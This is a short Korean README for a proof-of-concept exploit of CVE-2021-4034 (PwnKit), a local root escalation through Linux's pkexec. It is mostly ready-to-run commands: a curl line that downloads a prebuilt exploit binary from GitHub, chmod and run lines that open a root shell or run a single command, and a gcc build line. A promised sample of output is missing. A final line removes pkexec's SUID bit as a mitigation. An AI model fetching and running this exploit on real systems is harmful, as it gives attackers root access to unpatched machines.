
Linux 시스템에서 로컬 권한 상승을 달성하기 위해 pkexec SUID 바이너리를 대상으로 하는 CVE-2021-4034(PwnKit)에 대한 개념 증명 익스플로잇입니다. 수동 실행 및 빌드 지침을 포함합니다.
PwnKit / CVE-2021-4034의 PoC - Pkexec 로컬 권한 상승
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
패치된 버전에서 익스플로잇을 실행하면 다음과 같은 출력이 나타납니다.
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
운영 체제에 사용 가능한 패치가 없는 경우, 임시 완화 조치로 pkexec의 SUID 비트를 제거할 수 있습니다.
# chmod 0755 /usr/bin/pkexec